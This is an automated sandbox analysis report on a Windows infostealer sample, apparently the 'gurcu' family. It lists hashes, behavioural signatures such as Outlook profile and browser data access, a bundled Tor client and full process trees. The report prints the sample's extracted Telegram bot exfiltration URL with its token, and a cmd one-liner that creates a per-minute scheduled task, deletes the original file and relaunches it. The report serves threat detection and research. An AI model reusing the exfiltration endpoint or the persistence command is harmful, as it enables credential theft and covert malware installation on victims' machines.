Resubmissions
10-04-2024 02:25
240410-cwlljsbh99 1010-04-2024 02:25
240410-cwlasafc5v 1010-04-2024 02:25
240410-cwkn9afc5t 1010-04-2024 02:25
240410-cwkdgsfc5s 1014-10-2023 04:25
231014-e12vfagc2y 10Analysis
-
max time kernel
598s -
max time network
603s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 02:25
Behavioral task
behavioral1
Sample
Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe
Resource
win11-20240221-en
General
-
Target
Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe
-
Size
289KB
-
MD5
88cfc2ccc0575567122d1d233f9eb1c3
-
SHA1
4be67d0d801197f88c14d62f4495f17e89fc471f
-
SHA256
41505242cdbf259aada52b773daeec33d239e4aefd685ba9e406d2cf2f9871a4
-
SHA512
a2dd9ab7a2fe2a6d596c78394f65956f3e8973940229b305e2d763be69ff9f27b1450b5e08ca57cd0886a873fb663daad20ca94d9262a6c80a582dfc5f2e42b7
-
SSDEEP
6144:uHClm6SWPoK5Z0EwVSmRPQp+L5v9bbSUpi:uHCnZxb8hLLSUpi
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6176004110:AAFKA5be4dMwA848HWxzYIzrzzOGIHMOJGc/sendMessage?chat_id=615133582
Signatures
-
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe -
Executes dropped EXE 20 IoCs
pid Process 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 216 tor.exe 4708 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 1784 tor.exe 468 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 1624 tor.exe 4604 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 3616 tor.exe 4848 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 1592 tor.exe 228 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 4432 tor.exe 1548 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 2484 tor.exe 3076 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 732 tor.exe 4028 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 2472 tor.exe 3568 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 3604 tor.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 ip-api.com 144 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3000 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2068 PING.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2824 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 4708 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 468 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 4604 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 4848 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 228 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 1548 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 3076 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 4028 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe Token: SeDebugPrivilege 3568 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2824 wrote to memory of 3892 2824 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 94 PID 2824 wrote to memory of 3892 2824 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 94 PID 3892 wrote to memory of 4468 3892 cmd.exe 96 PID 3892 wrote to memory of 4468 3892 cmd.exe 96 PID 3892 wrote to memory of 2068 3892 cmd.exe 97 PID 3892 wrote to memory of 2068 3892 cmd.exe 97 PID 3892 wrote to memory of 3000 3892 cmd.exe 99 PID 3892 wrote to memory of 3000 3892 cmd.exe 99 PID 3892 wrote to memory of 436 3892 cmd.exe 100 PID 3892 wrote to memory of 436 3892 cmd.exe 100 PID 436 wrote to memory of 832 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 105 PID 436 wrote to memory of 832 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 105 PID 436 wrote to memory of 216 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 107 PID 436 wrote to memory of 216 436 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 107 PID 4708 wrote to memory of 1784 4708 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 115 PID 4708 wrote to memory of 1784 4708 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 115 PID 468 wrote to memory of 1624 468 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 121 PID 468 wrote to memory of 1624 468 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 121 PID 4604 wrote to memory of 3616 4604 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 126 PID 4604 wrote to memory of 3616 4604 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 126 PID 4848 wrote to memory of 1592 4848 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 131 PID 4848 wrote to memory of 1592 4848 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 131 PID 228 wrote to memory of 4432 228 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 136 PID 228 wrote to memory of 4432 228 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 136 PID 1548 wrote to memory of 2484 1548 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 141 PID 1548 wrote to memory of 2484 1548 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 141 PID 3076 wrote to memory of 732 3076 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 146 PID 3076 wrote to memory of 732 3076 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 146 PID 4028 wrote to memory of 2472 4028 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 152 PID 4028 wrote to memory of 2472 4028 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 152 PID 3568 wrote to memory of 3604 3568 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 157 PID 3568 wrote to memory of 3604 3568 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe 157 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe"C:\Users\Admin\AppData\Local\Temp\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Xd2c386a3a6edfe99de10f6ce6b3659c4809a" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4468
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2068
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Xd2c386a3a6edfe99de10f6ce6b3659c4809a" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:3000
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe"C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\tar.exe"C:\Windows\System32\tar.exe" -xvzf "C:\Users\Admin\AppData\Local\Temp\tmp1037.tmp" -C "C:\Users\Admin\AppData\Local\xdh16uwiax"4⤵PID:832
-
-
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"4⤵
- Executes dropped EXE
PID:216
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3652 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:81⤵PID:3476
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4708 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:1784
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:1624
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:3616
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:1592
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:2484
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2628 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:81⤵PID:4360
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:2472
-
-
C:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exeC:\Users\Admin\AppData\Local\Nvidia\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe"C:\Users\Admin\AppData\Local\xdh16uwiax\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\xdh16uwiax\torrc.txt"2⤵
- Executes dropped EXE
PID:3604
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Xd2c386a3a6edfe99de10f6ce6b3659c4809a.exe.log
Filesize847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
289KB
MD588cfc2ccc0575567122d1d233f9eb1c3
SHA14be67d0d801197f88c14d62f4495f17e89fc471f
SHA25641505242cdbf259aada52b773daeec33d239e4aefd685ba9e406d2cf2f9871a4
SHA512a2dd9ab7a2fe2a6d596c78394f65956f3e8973940229b305e2d763be69ff9f27b1450b5e08ca57cd0886a873fb663daad20ca94d9262a6c80a582dfc5f2e42b7
-
Filesize
13.3MB
MD589d2d5811c1aff539bb355f15f3ddad0
SHA15bb3577c25b6d323d927200c48cd184a3e27c873
SHA256b630008f6d3887793d48b87091e56691e292894dd4fa100dc4a418a2f29dcc12
SHA51239e576124c54143520c5435a2ef9b24506131e13403489c0692f09b89135015d611c4988d4772f8a1e6557fa68b4667d467334461009cee8c2227dfc3e295289
-
Filesize
2.7MB
MD5a0db8a87f7b723266c8b04255da46b06
SHA14df00ea56d22d88f3d2e005ef66bad5b3ef92ebf
SHA25660b43cdce0f807f7891521f396f53def34a7d98986dbde0faa2a197189c587f3
SHA51241b8fc467d11af7ca6a42c7e94d1b8295ab3ae5d6d186b4f378e6e079440520e8324b695da1134beb2bc1697d2491edcc70c1b75ab6fc66b9c1cb2ecbcdb4a7d
-
Filesize
9.4MB
MD503328a8389009d4cb95ed3f22f5e93bd
SHA184eb003fe2daf28dabd7ee2dac37f2cb5d498cbf
SHA256a9236c146400bf59997eac99148bb82ff5d8c3ae1092428846bff3c3cd915f64
SHA51251ea34dcfa930fc5a693c62820f7cff326c637a48f9bb56b213c61b1ceafef0c8fdb8cab00ba9b2e609aade9604fe4a441eef7d89ba0e94746ae845df3e2c3b4
-
Filesize
64B
MD5ebd60551eec158e0b460b9dd66f78b56
SHA11cb06b2eadd7013fe1686f5c01ed6298c3ea75f3
SHA256e88ea34da14f63009950e2d68ce9efbed0ef18ff5a5a7a6af2ee7258733a6e17
SHA512d9318599307ad783dc7754e747ee28e09babed9238606ffd5c0d16009e84e080a5076257d80bfc54c685ac72e6cb9ff958022c6c59f6527e899d29bd3710e410
-
Filesize
4B
MD5010e406df2463597c58286a93f8b3160
SHA1789de634fdc64489cf9ed0cbb4fa5ee200db6f29
SHA2568ae6830f615b04192db054fedd2c3dc466988c210ecc4e6332d4d98913f6305a
SHA5121b6d8a2271dd57ff456f4d1f97cd4817b79f28c9731e7f0c529710d5dc507f679a2cfc77c058941ca5a2aac11079c0edd152c7922639e79184037f0368482410
-
Filesize
7.4MB
MD588590909765350c0d70c6c34b1f31dd2
SHA1129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7
SHA25646fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82
SHA512a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192
-
Filesize
218B
MD516fc4231ddd58030fb9b74020cab512c
SHA12b7be9aace0bd8dfe6b5456d4ce26cffed49dc43
SHA256e094aaad3104dc1420d935ace2b74ef5ab6dd5123eb08e70bd30ec063318a0c2
SHA512546187324ce27f94b3b4b70edaf84ea2b28a14c693dd58441397386a4c4eac78f41aaf19207592cdaafdb90c110c657e697ece9b7f466e2dda9b70bdc7bd9b07